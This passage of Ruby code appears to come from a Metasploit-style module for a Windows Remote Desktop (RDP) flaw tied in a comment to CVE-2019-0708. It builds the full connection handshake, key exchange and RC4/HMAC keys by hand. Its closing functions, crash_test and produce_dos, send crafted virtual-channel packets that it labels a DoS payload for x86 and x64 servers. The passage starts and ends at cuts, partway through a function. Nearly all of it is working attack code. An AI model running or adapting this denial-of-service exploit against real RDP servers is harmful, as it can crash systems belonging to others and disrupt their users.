## FinalHash(K) = MD5(K + ClientRandom + ServerRandom).
def rdp_final_hash(k, client_random_bytes, server_random_bytes)
md5 = Digest::MD5.new
md5 << k
md5 << client_random_bytes
md5 << server_random_bytes
return([md5.hexdigest].pack("H*"))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923".
def rdp_hmac(mac_salt_key, data_content)
sha1 = Digest::SHA1.new
md5 = Digest::MD5.new
pad1 = "\x36" * 40
pad2 = "\x5c" * 48
sha1 << mac_salt_key
sha1 << pad1
sha1 << [data_content.length].pack('<L')
sha1 << data_content
md5 << mac_salt_key
md5 << pad2
md5 << [sha1.hexdigest].pack("H*")
return([md5.hexdigest].pack("H*"))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
## Parse Server MCS Connect Response PUD - 2.2.1.4
def rdp_parse_connect_response(pkt)
ptr = 0
rdp_pkt = pkt[0x49..pkt.length]
while(ptr < rdp_pkt.length)
header_type = rdp_pkt[ptr..ptr + 1]
header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
# vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}")
if(header_type == "\x02\x0c")
# vprint_status("Security header")
server_random = rdp_pkt[ptr + 20..ptr + 51]
public_exponent = rdp_pkt[ptr + 84..ptr + 87]
modulus = rdp_pkt[ptr + 88..ptr + 151]
# vprint_status("modulus_old: #{bin_to_hex(modulus)}")
rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
if(rsa_magic != "RSA1")
print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
raise RdpCommunicationError
end
# vprint_status("RSA magic: #{rsa_magic}")
bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
vprint_status("RSA #{bitlen}-bits")
modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
# vprint_status("modulus_new: #{bin_to_hex(modulus)}")
end
ptr += header_length
end
# vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}")
# vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
# vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}")
rsmod = bytes_to_bignum(modulus)
rsexp = bytes_to_bignum(public_exponent)
rsran = bytes_to_bignum(server_random)
vprint_status("MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}")
vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}")
return rsmod, rsexp, rsran, server_random, bitlen
end
def rdp_rc4_crypt(rc4obj, data)
rc4obj.encrypt(data)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
sha1 = Digest::SHA1.new
md5 = Digest::MD5.new
sha1 << i_bytes
sha1 << s_bytes
sha1 << client_random_bytes
sha1 << server_random_bytes
md5 << s_bytes
md5 << [sha1.hexdigest].pack("H*")
return([md5.hexdigest].pack("H*"))
end
def rdp_recv()
buffer_1 = sock.get_once(4, 5)
raise RdpCommunicationError unless buffer_1 # nil due to a timeout
buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5)
raise RdpCommunicationError unless buffer_2 # nil due to a timeout
vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}")
return(buffer_1 + buffer_2)
end
def rdp_send(data)
vprint_status("Send data: #{bin_to_hex(data)}")
sock.put(data)
end
def rdp_sendrecv(data)
rdp_send(data)
return(rdp_recv())
end
# ------------------------------------------------------------------------- #
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
## Client X.224 Connect Request PDU - 2.2.1.1
def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP)
## Blank username is valid, nil is random.
user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?)
tpkt_len = user_name.length + 38
x224_len = user_name.length + 33
return(
"\x03\x00" + # TPKT Header version 03, reserved 0
[tpkt_len].pack("S>") + # TPKT length: 43
[x224_len].pack("C") + # X.224 LengthIndicator
"\xe0" + # X.224 Type: Connect Request
"\x00\x00" + # dst reference
"\x00\x00" + # src reference
"\x00" + # class and options
"\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash='
user_name + # Identifier "username"
"\x0d\x0a" + # cookie terminator
"\x01\x00" + # Type: RDP Negotiation Request (0x01)
"\x08\x00" + # Length
[requested_protocols].pack('L<') # requestedProtocols
)
end
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS)
## After negotiating TLS or NLA the connectInitial packet needs to include the
## protocol selection that the server indicated in its negotiation response.
## TODO: If this is pulled into an RDP library then the channel list likely
## needs to be build dynamically. For example, MS_T120 likely should only
## ever be sent as part of checks for CVE-2019-0708.
## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE)
## 15 characters + null terminator, converted to unicode
## fixed length - 32 characters total
name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le')
name_unicode += "\x00" * (32 - name_unicode.length)
pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101)
"\x82\x01\xb2" + # Length (BER: Length)
"\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString)
"\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString)
"\x01\x01\xff" + # UpwaredFlag: True (BER: boolean)
## Connect-Initial: Target Parameters
"\x30\x19" + # TargetParamenters (BER: SequenceOf)
## *** not sure why the BER encoded Integers below have 2 byte values instead of one ***
"\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
## Connect-Intial: Minimum Parameters
"\x30\x19" + # MinimumParameters (BER: SequencOf)
"\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" +
## Connect-Initial: Maximum Parameters
"\x30\x1c" + # MaximumParameters (BER: SequencOf)
"\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" +
## Connect-Initial: UserData
"\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString)
## T.124 GCC Connection Data (ConnectData) - PER Encoding used
"\x00\x05" + # object length
"\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control
"\x81\x48" + # Length: ??? (Connect PDU)
"\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1
"\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key)
"\x81\x3a" + # Length: ??? (T.124 UserData section)
## Client MCS Section - 2.2.1.3
"\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2
"\xea\x00" + # Length: 234 (includes header)
"\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1)
"\x80\x07" + # desktopWidth: 1920
"\x38\x04" + # desktopHeigth: 1080
"\x01\xca" + # colorDepth: 8 bpp
"\x03\xaa" + # SASSequence: 43523
"\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US)
"\xee\x42\x00\x00" + # clientBuild: ????
[name_unicode].pack("a*") + # clientName
"\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102)
"\x00\x00\x00\x00" + # keyboadSubtype: 0
"\x0c\x00\x00\x00" + # keyboardFunctionKey: 12
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes)
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x01\xca" + # postBeta2ColorDepth: 8 bpp
"\x01\x00" + # clientProductID: 1
"\x00\x00\x00\x00" + # serialNumber: 0
"\x18\x00" + # highColorDepth: 24 bpp
"\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
"\xaf\x07" + # earlyCapabilityFlags
"\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes)
"\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
"\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
"\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
"\x07" + # connectionType: 7
"\x00" + # pad1octet
## serverSelectedProtocol - After negotiating TLS or CredSSP this value
## must match the selectedProtocol value from the server's Negotiate
## Connection confirm PDU that was sent before encryption was started.
[selected_proto].pack('L<') + # "\x01\x00\x00\x00"
"\x56\x02\x00\x00" +
"\x50\x01\x00\x00" +
"\x00\x00" +
"\x64\x00\x00\x00" +
"\x64\x00\x00\x00" +
"\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
"\x0c\x00" + # Length: 12 (includes header)
"\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
"\x00\x00\x00\x00" + # RedirectedSessionID
"\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
"\x0c\x00" + # Length: 12 (includes header)
"\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit)
"\x00\x00\x00\x00" + # extEncryptionMethods (French locale only)
"\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
"\x38\x00" + # Length: 56 (includes header)
channels_defs
## Fix. for packet modification.
## T.125 Connect-Initial
size_1 = [pdu.length - 5].pack("s") # Length (BER: Length)
pdu[3] = size_1[1]
pdu[4] = size_1[0]
## Connect-Initial: UserData
size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString)
pdu[100] = size_2[1]
pdu[101] = size_2[0]
## T.124 GCC Connection Data (ConnectData) - PER Encoding used
size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU)
pdu[109] = "\x81"
pdu[110] = size_3[0]
size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section)
pdu[123] = "\x81"
pdu[124] = size_4[0]
## Client MCS Section - 2.2.1.3
size_5 = [pdu.length - 383].pack("s") # Length (includes header)
pdu[385] = size_5[0]
rdp_build_data_tpdu(pdu)
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
## Client Security Exchange PDU - 2.2.1.10
def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
userdata_length = 8 + bitlen
userdata_length_low = userdata_length & 0xFF
userdata_length_high = userdata_length / 256
flags = 0x80 | userdata_length_high
pdu = "\x64" + # T.125 sendDataRequest
"\x00\x08" + # intiator userId
"\x03\xeb" + # channelId = 1003
"\x70" + # dataPriority = high, segmentation = begin | end
[flags].pack("C") +
[userdata_length_low].pack("C") + # UserData length
# TS_SECURITY_PACKET - 2.2.1.10.1
"\x01\x00" + # securityHeader flags
"\x00\x00" + # securityHeader flagsHi
[bitlen].pack("L<") + # TS_ length
encrypted_rcran + # encryptedClientRandom - 64 bytes
"\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
## Client MCS Erect Domain Request PDU - 2.2.1.5
def pdu_erect_domain_request()
pdu = "\x04" + # T.125 ErectDomainRequest
"\x01\x00" + # subHeight - length 1, value 0
"\x01\x00" # subInterval - length 1, value 0
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
## Client MCS Attach User Request PDU - 2.2.1.6
def pdu_attach_user_request()
pdu = "\x28" # T.125 AttachUserRequest
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
## Client MCS Channel Join Request PDU -2.2.1.8
def pdu_channel_request(user1, channel_id)
pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest
return(rdp_build_data_tpdu(pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
## TS_INFO_PACKET - 2.2.1.11.1.1
def pdu_client_info(user_name, domain_name = "", ip_address = "")
## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
## Max. len for all other versions is 512 including terminator.
## We're going to limit to 44 (21 chars + null -> unicode) here.
## Blank username is valid, nil = random.
user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')
uname_len = user_unicode.length
## Domain can can be, and for rdesktop typically is, empty.
## Max. len for 4.0/5.0 servers is 52 including terminator.
## Max. len for all other versions is 512 including terminator.
## We're going to limit to 52 (25 chars + null -> unicode) here.
domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
domain_len = domain_unicode.length
## This address value is primarily used to reduce the fields by which this
## module can be fingerprinted. It doesn't show up in Windows logs.
## clientAddress + null terminator
ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
ip_len = ip_unicode.length
pdu = "\xa1\xa5\x09\x04" +
"\x09\x04\xbb\x47" + # CodePage
"\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
[domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
[uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator
"\x00\x00" + # cbPassword (length value)
"\x00\x00" + # cbAlternateShell (length value)
"\x00\x00" + # cbWorkingDir (length value)
[domain_unicode].pack("a*") + # Domain
"\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain
[user_unicode].pack("a*") + # UserName
"\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName
"\x00\x00" + # Password - empty
"\x00\x00" + # AlternateShell - empty
## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
"\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
[ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
[ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
"\x3c\x00" + # cbClientDir (length value): 60
"\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
"\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
"\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
"\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
## These are the default values for rdesktop
"\xa4\x01\x00\x00" + # Bias
## StandardName - 'GTB,normaltid'
"\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
"\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
"\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate
"\x00\x00\x00\x00" + # StandardBias
## DaylightName - 'GTB,sommartid'
"\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
"\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
"\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate
"\xc4\xff\xff\xff" + # DaylightBias
"\x01\x00\x00\x00" + # clientSessionId
"\x06\x00\x00\x00" + # performanceFlags
"\x00\x00" + # cbAutoReconnectCookie
"\x64\x00\x00\x00"
return(pdu)
end
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
# Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
def pdu_client_confirm_active()
pdu = "\xea\x03\x01\x00" + # shareId: 66538
"\xea\x03" + # originatorId
"\x06\x00" + # lengthSourceDescriptor: 6
"\x3e\x02" + # lengthCombinedCapabilities: ???
"\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
"\x17\x00" + # numberCapabilities: 23
"\x00\x00" + # pad2Octets
"\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
"\x18\x00" + # lengthCapability: 24
"\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
"\x1c\x00" + # lengthCapability: 28
"\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
"\x01\x00\x00\x1a\x01\x00\x00\x00" +
"\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
"\x58\x00" + # lengthCapability: 88
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
"\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
"\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
"\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
"\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
"\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x0a\x00" + # capabilitySetType: 10 - ??
"\x08\x00" + # lengthCapability: 8
"\x06\x00\x00\x00" +
"\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
"\x0c\x00" + # lengthCapability: 12
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
"\x0c\x00" + # lengthCapability: 12
"\x00\x00\x00\x00\x02\x00\x02\x00" +
"\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
"\x0a\x00" + # lengthCapability: 10
"\x01\x00\x14\x00\x15\x00" +
"\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x00\x00\x00\x00" +
"\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
"\x58\x00" + # lengthCapability: 88
"\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
"\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00" +
"\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
"\x34\x00" + # lengthCapability: 52
"\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
"\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
"\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
"\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x11\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x01\x00\x00\x00\x00\x28\x64\x00" +
"\x14\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x01\x00\x00\x00\x00\x00\x00\x00" +
"\x15\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x02\x00\x00\x00\x00\x0a\x00\x01" +
"\x1a\x00" + # capabilitySetType: ??
"\x08\x00" + # lengthCapability: 8
"\xaf\x94\x00\x00" +
"\x1c\x00" + # capabilitySetType: ??
"\x0c\x00" + # lengthCapability: 12
"\x12\x00\x00\x00\x00\x00\x00\x00" +
"\x1b\x00" + # capabilitySetType: ??
"\x06\x00" + # lengthCapability: 6
"\x01\x00" +
"\x1e\x00" + # capabilitySetType: ??
"\x08\x00" + # lengthCapability: 8
"\x01\x00\x00\x00" +
"\x18\x00" + # capabilitySetType: ??
"\x0b\x00" + # lengthCapability: 11
"\x02\x00\x00\x00\x03\x0c\x00" +
"\x1d\x00" + # capabilitySetType: ??
"\x5f\x00" + # lengthCapability: 95
"\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
"\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
"\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
"\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
"\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
"\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
return(rdp_build_share_control_header(0x13, pdu))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1
def pdu_client_synchronize(target_user = 0)
pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC
[target_user].pack("S<") # targetUser, 16 bit, unsigned.
## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
data_header = rdp_build_share_data_header(0x1f, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
def pdu_client_control_cooperate()
pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE
"\x00\x00" + # grantId: 0
"\x00\x00\x00\x00" # controlId: 0
## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
data_header = rdp_build_share_data_header(0x14, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
## Control Request - TC_CONTROL_PDU 2.2.1.16
def pdu_client_control_request()
pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL
"\x00\x00" + # grantId: 0
"\x00\x00\x00\x00" # controlId: 0
## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
data_header = rdp_build_share_data_header(0x14, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
def pdu_client_input_event_sychronize()
pdu = "\x01\x00" + # numEvents: 1
"\x00\x00" + # pad2Octets
"\x00\x00\x00\x00" + # eventTime
"\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC
## TS_SYNC_EVENT 202.8.1.1.3.1.1.5
"\x00\x00" + # pad2Octets
"\x00\x00\x00\x00" # toggleFlags
## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
data_header = rdp_build_share_data_header(0x1c, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
def pdu_client_font_list()
pdu = "\x00\x00" + # numberFonts: 0
"\x00\x00" + # totalNumberFonts: 0
"\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
"\x32\x00" # entrySize: 50
## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST
data_header = rdp_build_share_data_header(0x27, pdu)
## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
return(rdp_build_share_control_header(0x17, data_header))
end
# ------------------------------------------------------------------------- #
def crash_test(rc4enckey, hmackey)
begin
received = ""
for i in 0..5
received += rdp_recv()
end
rescue RdpCommunicationError
# we don't care
end
vprint_status("Sending DoS payload")
found = false
for j in 0..15
## x86_payload:
rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
## x64_payload:
rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
end
end
def produce_dos()
unless(rdp_connection_initiation())
vprint_status("Could not connect to RDP.")
return(false)
end
vprint_status("Sending initial client data")
received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)
vprint_status("Sending erect domain request")
rdp_send(pdu_erect_domain_request())
vprint_status("Sending attach user request")
received = rdp_sendrecv(pdu_attach_user_request())
user1 = received[9, 2].unpack("n").first
[1003, 1004, 1005, 1006, 1007].each do | chan |
rdp_sendrecv(pdu_channel_request(user1, chan))
end
## 5.3.4 Client Random Value
client_rand = ''
32.times { client_rand << rand(0..255) }
rcran = bytes_to_bignum(client_rand)
vprint_status("Sending security exchange PDU")
rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
## We aren't decrypting anything at this point. Leave the variables here
## to make it easier to understand in the future.
rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}")
vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}")
